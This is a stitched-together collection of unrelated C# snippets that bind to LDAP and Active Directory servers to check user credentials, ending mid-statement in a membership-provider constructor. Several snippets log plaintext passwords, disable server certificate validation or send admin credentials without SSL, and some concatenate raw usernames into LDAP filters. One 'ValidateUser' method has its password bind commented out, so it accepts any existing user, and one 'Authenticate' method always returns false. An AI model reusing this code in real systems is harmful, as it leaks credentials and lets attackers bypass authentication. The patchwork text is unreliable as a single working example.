public LdapState Connect(NetworkCredential credential)
{
try
{
_ldapConnection = LdapConnectionFactory.GetLdapConnection(credential, _configRepository);
if (_adminModeChecker.IsAdminMode()) _ldapConnection.Bind(credential);
if (_adminModeChecker.IsAnonymousMode()) _ldapConnection.Bind(credential);
}
catch (Exception e)
{
string errorConnectionMessage = String.Format("{0}\n User: {1}\n Pwd: {2}{3}{4}{5}",
e.Message,
credential.UserName,
credential.Password,
(_configRepository.GetSecureSocketLayerFlag() ? "\n With SSL " : ""),
(_configRepository.GetTransportSocketLayerFlag()? "\n With TLS " : ""),
(_configRepository.GetClientCertificateFlag() ? "\n With Client Certificate" : ""));
_logger.Write(_logger.BuildLogMessage(errorConnectionMessage, LdapState.LdapConnectionError));
return LdapState.LdapConnectionError;
}
var successConnectionMessage = String.Format("Connection success\n User: {0}\n Pwd: {1}{2}{3}{4}",
credential.UserName,
credential.Password,
(_configRepository.GetSecureSocketLayerFlag() ? "\n With SSL " : ""),
(_configRepository.GetTransportSocketLayerFlag() ? "\n With TLS " : ""),
(_configRepository.GetClientCertificateFlag() ? "\n With Client Certificate" : ""));
if (_adminModeChecker.IsNoAdminMode())
_ldapConnection.Dispose();
_logger.Write(_logger.BuildLogMessage(successConnectionMessage, LdapState.LdapConnectionSuccess));
return LdapState.LdapConnectionSuccess;
}
public static void CheckCredentials(string login, string password, string server, int portNumber)
{
try
{
var domainName = server.Split('/').Last() + ":" + portNumber;
// if login with domain
login = login.Split('@')[0];
using (var ldap = new LDAPProtocols.LdapConnection(domainName))
{
var networkCredential = new NetworkCredential(login, password, domainName);
ldap.SessionOptions.VerifyServerCertificate = new LDAPProtocols.VerifyServerCertificateCallback((con, cer) => true);
ldap.SessionOptions.SecureSocketLayer = (portNumber == Constants.SSL_LDAP_PORT);
ldap.SessionOptions.ProtocolVersion = 3;
ldap.AuthType = LDAPProtocols.AuthType.Negotiate;
ldap.Bind(networkCredential);
}
}
catch (LDAPProtocols.LdapException e)
{
if (!e.ErrorCode.Equals(Constants.LDAP_ERROR_INVALID_CREDENTIALS))
{
_log.ErrorFormat("Internal LDAP authentication error: {0}.", e);
throw new COMException();
}
throw new DirectoryServicesCOMException();
}
catch (Exception e)
{
_log.ErrorFormat("Internal AD authentication error: {0}.", e);
throw new COMException();
}
}
public static SearchResponse GetSearchResponse(string searchFilter, string searchBase, int sizeLimit = 500)
{
//Establishing a Connection to the LDAP Server
//var ldapident = new LdapDirectoryIdentifier(STR_LDAPURL, STR_LDAPPort);
var ldapident = new LdapDirectoryIdentifier(STR_LDAPOLD, STR_LDAPPort);
//LdapConnection lc = new LdapConnection(ldapident, null, AuthType.Basic);
using (var lc = new LdapConnection(ldapident, new NetworkCredential(LDAPUser, LDAPPassword), AuthType.Basic))
{
lc.SessionOptions.ProtocolVersion = 3;
lc.SessionOptions.SecureSocketLayer = true;
lc.SessionOptions.VerifyServerCertificate = (connection, certificate) => true;
lc.Bind();
//Configure the Search Request to Query the UCD OpenLDAP Server's People Search Base for a Specific User ID or Mail ID and Return the Requested Attributes
var attributesToReturn = new string[]
{
STR_UID, STR_EmployeeNumber, STR_Mail, STR_Telephone, STR_DisplayName, STR_CN,
STR_SN, STR_GivenName, STR_PIDM
};
var sRequest = new SearchRequest(searchBase, searchFilter, SearchScope.Subtree, attributesToReturn) { SizeLimit = sizeLimit };
//Send the Request and Load the Response
var sResponse = (SearchResponse)lc.SendRequest(sRequest);
return sResponse;
}
}
public static async Task <IActionResult> Run(
[HttpTrigger(AuthorizationLevel.Function, "get", "post", Route = null)] HttpRequest req,
ILogger log)
{
log.LogInformation("C# HTTP trigger function processed a request.");
string username = req.Query["username"];
string password = req.Query["password"];
string requestBody = await new StreamReader(req.Body).ReadToEndAsync();
dynamic data = JsonConvert.DeserializeObject(requestBody);
username = username ?? data?.username;
if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password))
{
string responseMessage = "Parameters Missing";
return(new OkObjectResult(responseMessage));
}
bool authenticated = false;
try
{
LdapDirectoryIdentifier ldi = new LdapDirectoryIdentifier(Environment.GetEnvironmentVariable("LDAP_SERVER"), 389);
System.DirectoryServices.Protocols.LdapConnection ldapConnection =
new System.DirectoryServices.Protocols.LdapConnection(ldi);
Console.WriteLine("LdapConnection is created successfully.");
ldapConnection.AuthType = AuthType.Basic;
ldapConnection.SessionOptions.ProtocolVersion = 3;
NetworkCredential nc = new NetworkCredential("uid=" + username + ",ou=people,dc=eastus,dc=cloudapp,dc=azure,dc=com",
password);
ldapConnection.Bind(nc);
Console.WriteLine("LdapConnection authentication success");
ldapConnection.Dispose();
authenticated = true;
}
catch (DirectoryServicesCOMException cex)
{
log.LogInformation(cex.ToString());
}
catch (Exception ex)
{
log.LogInformation(ex.ToString());
}
if (authenticated != true)
{
string Message = "USER NOT AUTHENTICATED";
return(new OkObjectResult(Message));
}
else
{
string Message = "User is Auth in this organization unit";
return(new OkObjectResult(Message));
}
}
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
protected void StandardConnect(NetworkCredential credential)
{
if (LdapParameterChecker.ParametersIsNullOrEmpty(new []{credential.UserName})) throw new InvalidCredentialException("Username cannot be null or empty");
if (LdapParameterChecker.ParametersIsNullOrEmpty(new []{credential.Password})) throw new InvalidCredentialException("Password cannot be null or empty");
_ldapConnection = LdapConnectionFactory.GetLdapConnection(_configRepository);
_ldapConnection.Bind(credential);
}
public Client(string username, string domain, string password, string url)
{
var credentials = new NetworkCredential(username, password, domain);
var serverId = new LdapDirectoryIdentifier(url);
connection = new LdapConnection(serverId, credentials);
connection.Bind();
}
public bool ConnectLDAP()
{
m_LdapConnection = new LdapConnection(m_LdapServer);
m_LdapConnection.SessionOptions.ProtocolVersion = 3;
m_LdapConnection.AuthType = AuthType.Basic;
m_LdapConnection.Credential = m_Credential;
m_LdapConnection.Bind();
return true;
}
public void Start()
{
Guard.IsNull(_connection, "You may only call Start one time.");
_connection = new LdapConnection(
new LdapDirectoryIdentifier(_adServer),
null, AuthType.Negotiate);
_connection.Bind();
_timer = new Timer(timerCallback, null,
TimeSpan.FromSeconds(0),
pollingInterval);
}
public bool IsAuthenticated(string username, string pwd)
{
ILog log = LogManager.GetLogger(GetType());
try
{
log.InfoFormat("连接Ldap服务器,server是{0}", Server);
var connection = new LdapConnection(Server)
{
AuthType = AuthType.Basic
};
connection.SessionOptions.ProtocolVersion = 3;
if (!AnonymousLogin)
{
log.InfoFormat("使用Credential账户是{0},密码是{1}", CredentialUserName, CredentialPassword);
connection.Credential = new NetworkCredential(CredentialUserName, CredentialPassword ?? "");
}
if (IsSsl)
{
log.Info("使用SSL连接");
connection.SessionOptions.SecureSocketLayer = true;
}
log.DebugFormat("创建SearchRequest,distinguishedName是{0},filter是{1}", SearchUserPath, "uid=" + username);
var searchRequestion = new SearchRequest(SearchUserPath, "uid=" + username, SearchScope.Subtree);
var searchResult = (SearchResponse)connection.SendRequest(searchRequestion, new TimeSpan(0, 0, 0, 30));
if (searchResult.Entries.Count == 0)
{
log.InfoFormat("无法通过找到用户.distinguishedName是{0},filter是{1}", SearchUserPath, "uid=" + username);
return false;
}
SearchResultEntry entry = searchResult.Entries[0];
string dn = entry.DistinguishedName;
log.InfoFormat("DN是{0}", dn);
connection.Credential = new NetworkCredential(dn, pwd);
connection.Bind();
return true;
}
catch (Exception ex)
{
log.Error(ex.Message, ex);
return false;
}
}
public bool Authenticate(string password)
{
try
{
var credential = new NetworkCredential(UserName, password, Domain);
var ldapServer = Domain;
var ldapConnection = new LdapConnection(ldapServer);
ldapConnection.Bind(credential);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
return false;
}
return false;
}
public bool ValidateUserInternal(string username, string password)
{
LdapConnection connection = new LdapConnection(Domain);
try
{
connection.Bind(new NetworkCredential(username, password));
}
catch
{
return false;
}
finally
{
connection.Dispose();
}
return true;
}
public ValidationResult AuthenticateUser(UserDetails user)
{
ValidationResult validationResult = null;
try
{
LdapConnection lcon = new LdapConnection(new LdapDirectoryIdentifier(_adServerAddress, _ldapPortNumber));
NetworkCredential nc = new NetworkCredential(user.UserName, user.Password, Environment.UserDomainName);
lcon.Credential = nc;
lcon.AuthType = AuthType.Negotiate;
lcon.Bind(nc);
validationResult = new ValidationResult(true, false, null);
}
catch (LdapException e)
{
//tbd - investigate other possible ldap exceptions
//if (e.Message == "The supplied credential is invalid.")
if (e.ErrorCode.Equals(LDAPError_InvalidCredentials))
{
validationResult = new ValidationResult(false, true, e.Message);
}
else
{
//implement logging and exception email handling here.
validationResult = new ValidationResult(false, true, "A system error occured, please contact system administrator and/or check system logs.");
}
}
catch (Exception e)
{
validationResult = new ValidationResult(false, true, "A system error occured, please contact system administrator and/or check system logs.");
//add new fields for error logging
var errorLoggingWSClient = new ErrorLoggingServiceClient();
errorLoggingWSClient.LogApplicationError(new ApplicationErrorRequest()
{
ApplicationName = "KingstonWharvesWS.ADAuthentication"
});
}
return validationResult;
}
/// <summary>
/// Autentica a un usuario contra openLDAP y verifica su membresia en alguno de los grupos
/// </summary>
/// <param name="nombreUsuario">Nombre de usuario</param>
/// <param name="password">Contraseña del usuario</param>
/// <returns>El grupo al que pertenece el usuario o null en caso que no esté registrado.</returns>
public GrupoLDAP autenticarUsuario(string nombreUsuario, string password)
{
// Valida usuario y contraseña correctos
LdapDirectoryIdentifier serverInfo = new LdapDirectoryIdentifier(Constantes.LDAP_SERVER);
LdapConnection openLdap = new LdapConnection(Constantes.LDAP_SERVER);
openLdap.Credential = new System.Net.NetworkCredential("uid=" + nombreUsuario + ",ou=people,dc=ic-itcr,dc=ac,dc=cr", password);
openLdap.AuthType = AuthType.Basic;
openLdap.SessionOptions.ProtocolVersion = 3;
try
{
openLdap.Bind();
}
catch (Exception e)
{
openLdap.Dispose();
_conexionBD = new ManejoBD();
_conexionBD.insertarBitacoraError(e.ToString(), "");
return null;
}
// Buscar grupo al que pertenezca el usuario
foreach (GrupoLDAP grupo in _listadaGrupos.obtenerGruposLDAP())
{
SearchRequest searchRequest = new SearchRequest("cn=" + grupo.NombreGrupo + ",ou=group,dc=ic-itcr,dc=ac,dc=cr", "(memberUid=" + nombreUsuario + ")", System.DirectoryServices.Protocols.SearchScope.Subtree);
try
{
SearchResponse searchResponse = (SearchResponse)openLdap.SendRequest(searchRequest);
if (searchResponse.Entries.Count != 0)
{
openLdap.Dispose();
return grupo;
}
}
catch (Exception e)// En caso que algún grupo registrado en ListadoGruposLDAP.getGroupList() no exista.
{
_conexionBD = new ManejoBD();
_conexionBD.insertarBitacoraError(e.ToString(), "Algún grupo registrado en ListadoGruposLDAP.getGroupList() no existe.");
continue;
}
}
openLdap.Dispose();
return null;
}
public LdapUserModel ValidateUsernameAndPassword(string username, string password)
{
var ldapServer = Configuration.Server;
var baseDn = Configuration.BaseDn;
try
{
LdapConnection connection = new LdapConnection(ldapServer);
connection.SessionOptions.SecureSocketLayer = true;
connection.SessionOptions.VerifyServerCertificate = (ldapConnection, certificate) => true;
connection.AuthType = AuthType.Negotiate;
NetworkCredential credential = new NetworkCredential(username, password);
connection.Credential = credential;
connection.Bind();
string filter = string.Format(CultureInfo.InvariantCulture, "(&(objectClass=user)(objectCategory=user) (sAMAccountName={0}))", LdapEncode(username));
var attributes = new[] { "sAMAccountName", "displayName", "mail" };
SearchRequest searchRequest = new SearchRequest(baseDn, filter, SearchScope.Subtree, attributes);
var searchResponse = (SearchResponse)connection.SendRequest(searchRequest);
if (searchResponse?.ResultCode == ResultCode.Success)
{
var entry = searchResponse.Entries[0];
var model = new LdapUserModel
{
Identity = GetStringValue(entry, "sAMAccountName"),
Email = GetStringValue(entry, "mail"),
Username = GetStringValue(entry, "sAMAccountName"),
};
return model;
}
}
catch (Exception)
{
return null;
}
return null;
}
public bool CheckUserCredential(String UserName, String Password)
{
try
{
LdapDirectoryIdentifier ldi = new LdapDirectoryIdentifier(_ldapServers, _ldapPort, true, false);
LdapConnection lc = new LdapConnection(ldi);
lc.AuthType = AuthType.Kerberos;
String ldapUser = String.Format("{0}@{1}", UserName, _userSuffix);
lc.Credential = new NetworkCredential(ldapUser, Password);
lc.Bind();
return true;
}
catch (Exception e)
{
throw;
}
}
public bool CheckCredentials(string login, string password)
{
if (login == null)
{
throw new ArgumentNullException("login");
}
if (password == null)
{
throw new ArgumentNullException("password");
}
if (Server == null)
{
throw new ArgumentNullException("Server");
}
try
{
var domainName = Server.Split('/').Last() + ":" + PortNumber;
// if login with domain
login = login.Split('@')[0];
using (var ldap = new LDAPProtocols.LdapConnection(domainName))
{
var networkCredential = new NetworkCredential(login, password, domainName);
ldap.SessionOptions.VerifyServerCertificate = new LDAPProtocols.VerifyServerCertificateCallback((con, cer) => true);
ldap.SessionOptions.SecureSocketLayer = (PortNumber == SSL_LDAP_PORT);
ldap.SessionOptions.ProtocolVersion = 3;
ldap.AuthType = LDAPProtocols.AuthType.Negotiate;
ldap.Bind(networkCredential);
}
return(true);
}
catch (Exception e)
{
_log.ErrorFormat("Internal LDAP authentication error: {0}. {1}", e, e.StackTrace);
}
return(false);
}
public void InitializeTest()
{
ISchemaInfo target = new AdsSchemaInfo();
using (LdapConnection conn = new LdapConnection("localhost:20389"))
{
conn.Bind(System.Net.CredentialCache.DefaultNetworkCredentials);
target.Initialize(conn);
}
int ocs = 0;
foreach (ObjectClassSchema o in target.ObjectClasses)
{
System.Console.WriteLine("oc: {0}", o);
foreach (AttributeSchema a in o.MustHave)
System.Console.WriteLine(" must: {0} as {1}", a, a.LangType);
foreach (AttributeSchema a in o.MayHave)
System.Console.WriteLine(" may : {0} as {1}", a, a.LangType);
ocs++;
}
Assert.IsTrue(ocs >= 10, "At least 10 object classes found");
ObjectClassSchema user = target.GetObjectClass("USER");
Assert.IsTrue(user != null, "Found 'USER' (mixed case) objectclass");
user = target.GetObjectClass("NO-SUCH-THING");
Assert.IsNull(user);
AttributeSchema attr = target.GetAttribute("cn");
Assert.IsNotNull(attr);
attr = target.GetAttribute("NO-ATTRIBUTE");
Assert.IsNull(attr);
}
private static bool ValidateLdapCredentials(string userName, string password, string domain)
{
LdapDirectoryIdentifier directoryIdentifier = new LdapDirectoryIdentifier(domain);
var credentials = new NetworkCredential(userName, password, domain);
using (var connection = new LdapConnection(directoryIdentifier, credentials, AuthType.Kerberos))
{
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
try
{
connection.Bind();
}
catch (LdapException ex)
{
if (ex.ErrorCode == ErrorLoginFailure)
{
return false;
}
throw;
}
}
return true;
}
// ----- CONSTRUCTORS -----
/// <summary>
/// Establishes a connection with an LDAP server that can be used to query or modify its contents.
/// <param name="servers">A list of servers by fully qualified domain name, host name, ip address, or null.</param>
/// <param name="portNumber">The port number on the LDAP server that is listening for requests.</param>
/// <param name="authType">(Optional) The type of authentication to use when connecting with the server. By default this is set to Anonymous (i.e. no credentials required).</param>
/// <param name="userName">(Optional) The user name to use when connecting to the LDAP server.</param>
/// <param name="password">(Optional) The password to use with the user name provided to connect to the LDAP server.</param>
/// <param name="domainName">(Optional) The domain or computer name associated with the user credentials provided.</param>
/// </summary>
public LDAP(List<string> servers, int portNumber, AuthType authType = AuthType.Anonymous, string userName = null, SecureString password = null, string domainName = null)
{
if (servers != null && servers.Count > 0 && portNumber > 0 && !string.IsNullOrWhiteSpace(userName) && password != null)
{
try
{
// Setup the server information for the connection.
LdapDirectoryIdentifier directoryIdentifier = new LdapDirectoryIdentifier(servers.ToArray(), portNumber, false, false);
// Setup the credential to use when accessing the server. (Or null for Anonymous.)
NetworkCredential credential = null;
if (authType != AuthType.Anonymous)
{
credential = new NetworkCredential(userName, password);
if (!string.IsNullOrWhiteSpace(domainName))
{
// A domain was provided. Use it when creating the credential.
credential.Domain = domainName;
}
}
// Create the connection to the server(s).
try
{
connection = new LdapConnection(directoryIdentifier, credential, authType);
// Gather information about the LDAP server(s) from the RootDSE entry.
SearchResponse rootDSESearchResponse = (SearchResponse)connection.SendRequest(new SearchRequest(null, "(objectClass=*)", SearchScope.Base));
if (rootDSESearchResponse != null && rootDSESearchResponse.ResultCode == ResultCode.Success)
{
// Save the rootDSE for access by API clients.
rootDSE = rootDSESearchResponse.Entries[0];
SearchResultAttributeCollection attributes = rootDSE.Attributes;
// Check that LDAP V3 is supported.
if (attributes["supportedLDAPVersion"].GetValues(typeof(string)).Contains("3"))
{
// Get all of the naming contexts this server(s) supports.
namingContexts = (string[])attributes["namingContexts"].GetValues(typeof(string));
// Set the base DN for searching to the first naming context in the list.
searchBaseDN = namingContexts[0];
// Get any alternate servers can complete our requests should this one stop responding.
// If there are not other servers to contact this attribute is not available.
if (attributes.Contains("altServer"))
{
alternateServers = (string[])attributes["altServer"].GetValues(typeof(string));
}
}
else
{
throw new NotSupportedException("The directory server does not support LDAP v3.");
}
}
// Bind to the ldap server with the connection credentials if supplied.
if (connection.AuthType != AuthType.Anonymous)
{
connection.Bind();
}
}
catch (System.ComponentModel.InvalidEnumArgumentException)
{
// Thrown when authType is out of range.
throw new ArgumentOutOfRangeException("authType");
}
}
catch (ArgumentException)
{
throw new ArgumentException("Entries in the servers parameter can not have spaces.");
}
}
else
{
if (servers == null || servers.Count == 0)
{
throw new ArgumentNullException("servers", "The list of servers can not be null or empty.");
}
if (portNumber <= 0)
{
throw new ArgumentOutOfRangeException("portNumber", "A port number must be positive.");
}
}
}
private User queryLdap(string email)
{
string ldapFilter = "(objectClass=person)";
string ldapTarget = DN.Replace("{0}", email);
User user = new User();
network = new NetworkCredential(ADMIN, ADMIN_PASS);
ldapId = new LdapDirectoryIdentifier(HOST, PORT);
using (LdapConnection connection = new LdapConnection(ldapId, network, AuthType.Basic))
{
try
{
connection.SessionOptions.SecureSocketLayer = false;
connection.SessionOptions.ProtocolVersion = 3;
connection.Bind();
SearchRequest searchRequest = new SearchRequest(ldapTarget, ldapFilter, SearchScope.Subtree, "*");
SearchResponse searchResponse = (SearchResponse)connection.SendRequest(searchRequest);
SearchResultEntry entry = searchResponse.Entries[0];
user.email = email;
user.userId = entry.Attributes["employeeNumber"][0].ToString();
user.userName = entry.Attributes["cn"][0].ToString();
user.lastName = entry.Attributes["sn"][0].ToString();
user.userGroup = entry.Attributes["departmentNumber"][0].ToString();
connection.Dispose();
return user;
}
catch (LdapException ex)
{
throw new BusinessException(ex.Message);
}
catch (Exception e)
{
throw new PlatformException(e.Message);
}
}
}
/// <summary>
/// Authenticate a user against a AD server
/// </summary>
/// <param name="username">username to check</param>
/// <param name="password">password of the user</param>
/// <returns></returns>
public bool ValidateUser(string username, string password)
{
try
{
LdapConnection ldap = new LdapConnection(new LdapDirectoryIdentifier(host, port));
ldap.SessionOptions.ProtocolVersion = protocolVersion;
ldap.AuthType = AuthType.Basic;
ldap.Credential = new NetworkCredential(adminUsername, adminPassword);
ldap.SessionOptions.SecureSocketLayer = secureSocket;
ldap.Bind();
ldap.AuthType = AuthType.Basic;
SearchRequest searchRequest = new SearchRequest(
baseDn,
string.Format(CultureInfo.InvariantCulture, "{0}={1}", authUid, username),
SearchScope.Subtree
);
SearchResponse searchResponse = (SearchResponse)ldap.SendRequest(searchRequest);
if (1 == searchResponse.Entries.Count)
{
//ldap.Bind(new NetworkCredential(searchResponse.Entries[0].DistinguishedName, password));
}
else
{
throw new Exception("Login failed.");
}
}
catch (Exception e)
{
//Todo: Pass error to logging framework instead of console!
Console.WriteLine(e.Message);
return false;
}
return true;
}
/// <summary>
/// Establish the LDAP Connection
/// </summary>
public LdapConnection CreateLDAPConnection()
{
LdapDirectoryIdentifier identifier = CreateIdentifier();
System.Net.NetworkCredential credential = CreateCredentials();
AuthType _authType = (System.DirectoryServices.Protocols.AuthType)Enum.Parse(typeof(System.DirectoryServices.Protocols.AuthType), this.LDAPAuthType);
LdapConnection connection = new LdapConnection(identifier, credential, _authType);
connection.SessionOptions.ProtocolVersion = this.ProtocolVers;
connection.SessionOptions.VerifyServerCertificate = new VerifyServerCertificateCallback(this.VerifyServerCertificate);
connection.SessionOptions.QueryClientCertificate = new QueryClientCertificateCallback(this.QueryClientCertificate);
TimeSpan _timeSpan = new TimeSpan(0, 0, this.QueryTimeout);
connection.Timeout = _timeSpan;
connection.SessionOptions.SecureSocketLayer = true;
connection.Bind();
return connection;
}
internal DirectoryInformation(string adspath,
NetworkCredential credentials,
string connProtection,
int clientSearchTimeout,
int serverSearchTimeout,
bool enablePasswordReset)
{
//
// all parameters have already been validated at this point
//
this.adspath = adspath;
this.credentials = credentials;
this.clientSearchTimeout = clientSearchTimeout;
this.serverSearchTimeout = serverSearchTimeout;
Debug.Assert(adspath != null);
Debug.Assert(adspath.Length > 0);
//
// Provider must be LDAP
//
if (!(adspath.StartsWith("LDAP", StringComparison.Ordinal)))
throw new ProviderException(SR.GetString(SR.ADMembership_OnlyLdap_supported));
//
// Parse out the server/domain information
//
NativeComInterfaces.IAdsPathname pathCracker = (NativeComInterfaces.IAdsPathname) new NativeComInterfaces.Pathname();
try {
pathCracker.Set(adspath, NativeComInterfaces.ADS_SETTYPE_FULL);
}
catch (COMException e)
{
if (e.ErrorCode == unchecked((int) 0x80005000))
throw new ProviderException(SR.GetString(SR.ADMembership_invalid_path));
else
throw;
}
// Get the server and container names
try
{
serverName = pathCracker.Retrieve(NativeComInterfaces.ADS_FORMAT_SERVER);
}
catch (COMException e)
{
if (e.ErrorCode == unchecked((int) 0x80005000))
throw new ProviderException(SR.GetString(SR.ADMembership_ServerlessADsPath_not_supported));
else
throw;
}
Debug.Assert(serverName != null);
creationContainerDN = containerDN = pathCracker.Retrieve(NativeComInterfaces.ADS_FORMAT_X500_DN);
//
// Parse out the port number if specified
//
int index = serverName.IndexOf(':');
if (index != -1)
{
string tempStr = serverName;
serverName = tempStr.Substring(0, index);
Debug.Assert(tempStr.Length > index);
port = Int32.Parse(tempStr.Substring(index + 1), NumberFormatInfo.InvariantInfo);
portSpecified = true;
}
if (String.Compare(connProtection, "Secure", StringComparison.Ordinal) == 0)
{
//
// The logic is as follows:
// 1. Try Ssl first and check if concurrent binds are possible for validating users
// 2. If Ssl is not supported, try signing and sealing
// 3. If both the above are not supported, then we will fail
//
bool trySignAndSeal = false;
bool trySslWithSecureAuth = false;
// first try with simple bind
if (!IsDefaultCredential())
{
authenticationType = GetAuthenticationTypes(ActiveDirectoryConnectionProtection.Ssl, CredentialsType.NonWindows);
ldapAuthType = GetLdapAuthenticationTypes(ActiveDirectoryConnectionProtection.Ssl, CredentialsType.NonWindows);
try
{
rootdse = new DirectoryEntry(GetADsPath("rootdse"), GetUsername(), GetPassword(), authenticationType);
// this will force a bind
rootdse.RefreshCache();
this.connectionProtection = ActiveDirectoryConnectionProtection.Ssl;
if (!portSpecified)
{
port = SSL_PORT;
portSpecified = true;
}
}
catch (COMException ce)
{
if (ce.ErrorCode == unchecked((int) 0x8007052e))
{
//
// this could be an ADAM target with windows user (in that case simple bind will not work)
//
trySslWithSecureAuth = true;
}
else if (ce.ErrorCode == unchecked((int) 0x8007203a))
{
// server is not operational error, do nothing, we need to fall back to SignAndSeal
trySignAndSeal = true;
}
else
throw;
}
}
else
{
// default credentials, so we have to do secure bind
trySslWithSecureAuth = true;
}
if (trySslWithSecureAuth)
{
authenticationType = GetAuthenticationTypes(ActiveDirectoryConnectionProtection.Ssl, CredentialsType.Windows);
ldapAuthType = GetLdapAuthenticationTypes(ActiveDirectoryConnectionProtection.Ssl, CredentialsType.Windows);
try
{
rootdse = new DirectoryEntry(GetADsPath("rootdse"), GetUsername(), GetPassword(), authenticationType);
// this will force a bind
rootdse.RefreshCache();
this.connectionProtection = ActiveDirectoryConnectionProtection.Ssl;
if (!portSpecified)
{
port = SSL_PORT;
portSpecified = true;
}
}
catch (COMException ce)
{
if (ce.ErrorCode == unchecked((int) 0x8007203a))
{
// server is not operational error, do nothing, we need to fall back to SignAndSeal
trySignAndSeal = true;
}
else
throw;
}
}
if (trySignAndSeal)
{
authenticationType = GetAuthenticationTypes(ActiveDirectoryConnectionProtection.SignAndSeal, CredentialsType.Windows);
ldapAuthType = GetLdapAuthenticationTypes(ActiveDirectoryConnectionProtection.SignAndSeal, CredentialsType.Windows);
try
{
rootdse = new DirectoryEntry(GetADsPath("rootdse"), GetUsername(), GetPassword(), authenticationType);
rootdse.RefreshCache();
this.connectionProtection = ActiveDirectoryConnectionProtection.SignAndSeal;
}
catch (COMException e)
{
throw new ProviderException(SR.GetString(SR.ADMembership_Secure_connection_not_established, e.Message), e);
}
}
}
else
{
//
// No connection protection
//
//
// we will do a simple bind but we must ensure that the credentials are explicitly specified
// since in the case of default credentials we cannot honor it (default credentials become anonymous in the case of
// simple bind)
//
if (IsDefaultCredential())
throw new NotSupportedException(SR.GetString(SR.ADMembership_Default_Creds_not_supported));
// simple bind
authenticationType = GetAuthenticationTypes(connectionProtection, CredentialsType.NonWindows);
ldapAuthType = GetLdapAuthenticationTypes(connectionProtection, CredentialsType.NonWindows);
rootdse = new DirectoryEntry(GetADsPath("rootdse"), GetUsername(), GetPassword(), authenticationType);
}
//
// Determine whether this is AD or ADAM by binding to the rootdse and
// checking the supported capabilities
//
if (rootdse == null)
rootdse = new DirectoryEntry(GetADsPath("RootDSE"), GetUsername(), GetPassword(), authenticationType);
directoryType = GetDirectoryType();
//
// if the directory type is ADAM and the conntectionProtection was selected
// as sign and seal, then we should throw an ProviderException. This is becuase validate user will always fail for ADAM
// because ADAM does not support secure authentication for ADAM users.
//
if ((directoryType == DirectoryType.ADAM) && (this.connectionProtection == ActiveDirectoryConnectionProtection.SignAndSeal))
throw new ProviderException(SR.GetString(SR.ADMembership_Ssl_connection_not_established));
//
// for AD, we need to block the GC ports
//
if ((directoryType == DirectoryType.AD) && ((port == GC_PORT) || (port == GC_SSL_PORT)))
throw new ProviderException(SR.GetString(SR.ADMembership_GCPortsNotSupported));
//
// if container dn is null, we need to get the default naming context
// (containerDN cannot be null for ADAM)
//
if (String.IsNullOrEmpty(containerDN))
{
if (directoryType == DirectoryType.AD)
{
containerDN = (string)rootdse.Properties["defaultNamingContext"].Value;
if (containerDN == null)
throw new ProviderException(SR.GetString(SR.ADMembership_DefContainer_not_specified));
//
// we will create users in the default users container, check that it exists
//
string wkUsersContainerPath = GetADsPath("<WKGUID=" + GUID_USERS_CONTAINER_W + "," + containerDN + ">");
DirectoryEntry containerEntry = new DirectoryEntry(wkUsersContainerPath, GetUsername(), GetPassword(), authenticationType);
try
{
creationContainerDN = (string) PropertyManager.GetPropertyValue(containerEntry, "distinguishedName");
}
catch (COMException ce)
{
if (ce.ErrorCode == unchecked((int) 0x80072030))
throw new ProviderException(SR.GetString(SR.ADMembership_DefContainer_does_not_exist));
else
throw;
}
}
else
{
// container must be specified for ADAM
throw new ProviderException(SR.GetString(SR.ADMembership_Container_must_be_specified));
}
}
else
{
//
// Normalize the container name (incase it was specified as GUID or WKGUID)
//
DirectoryEntry containerEntry = new DirectoryEntry(GetADsPath(containerDN), GetUsername(), GetPassword(), authenticationType);
try
{
creationContainerDN = containerDN = (string) PropertyManager.GetPropertyValue(containerEntry, "distinguishedName");
}
catch (COMException ce)
{
if (ce.ErrorCode == unchecked((int) 0x80072030))
throw new ProviderException(SR.GetString(SR.ADMembership_Container_does_not_exist));
else
throw;
}
}
//
// Check if the specified path(container) exists on the specified server/domain
// (NOTE: We need to do this using S.DS.Protocols rather than S.DS because we need to
// bypass the referral chasing which is automatic in S.DS)
//
LdapConnection tempConnection = new LdapConnection(new LdapDirectoryIdentifier(serverName + ":" + port), GetCredentialsWithDomain(credentials), ldapAuthType);
tempConnection.SessionOptions.ProtocolVersion = 3;
try
{
tempConnection.SessionOptions.ReferralChasing = System.DirectoryServices.Protocols.ReferralChasingOptions.None;
SetSessionOptionsForSecureConnection(tempConnection, false /*useConcurrentBind */);
tempConnection.Bind();
SearchRequest request = new SearchRequest();
request.DistinguishedName = containerDN;
request.Filter = "(objectClass=*)";
request.Scope = System.DirectoryServices.Protocols.SearchScope.Base;
request.Attributes.Add("distinguishedName");
request.Attributes.Add("objectClass");
if (ServerSearchTimeout != -1)
request.TimeLimit = new TimeSpan(0, ServerSearchTimeout, 0);
SearchResponse response;
try
{
response = (SearchResponse) tempConnection.SendRequest(request);
if (response.ResultCode == ResultCode.Referral || response.ResultCode == ResultCode.NoSuchObject)
throw new ProviderException(SR.GetString(SR.ADMembership_Container_does_not_exist));
else if (response.ResultCode != ResultCode.Success)
throw new ProviderException(response.ErrorMessage);
}
catch (DirectoryOperationException oe)
{
SearchResponse errorResponse = (SearchResponse) oe.Response;
if (errorResponse.ResultCode == ResultCode.NoSuchObject)
throw new ProviderException(SR.GetString(SR.ADMembership_Container_does_not_exist));
else throw;
}
//
// check that the container is of an object type that can be a superior of a user object
//
DirectoryAttribute objectClass = response.Entries[0].Attributes["objectClass"];
if (!ContainerIsSuperiorOfUser(objectClass))
throw new ProviderException(SR.GetString(SR.ADMembership_Container_not_superior));
//
// Determine whether concurrent bind is supported
//
if ((connectionProtection == ActiveDirectoryConnectionProtection.None) || (connectionProtection == ActiveDirectoryConnectionProtection.Ssl))
{
this.concurrentBindSupported = IsConcurrentBindSupported(tempConnection);
}
}
finally
{
tempConnection.Dispose();
}
//
// if this is ADAM, get the partition DN
//
if (directoryType == DirectoryType.ADAM)
{
adamPartitionDN = GetADAMPartitionFromContainer();
}
else
{
if (enablePasswordReset)
{
// for AD, get the lockout duration for user account auto unlock
DirectoryEntry de = new DirectoryEntry(GetADsPath((string) PropertyManager.GetPropertyValue(rootdse, "defaultNamingContext")), GetUsername(), GetPassword(), AuthenticationTypes);
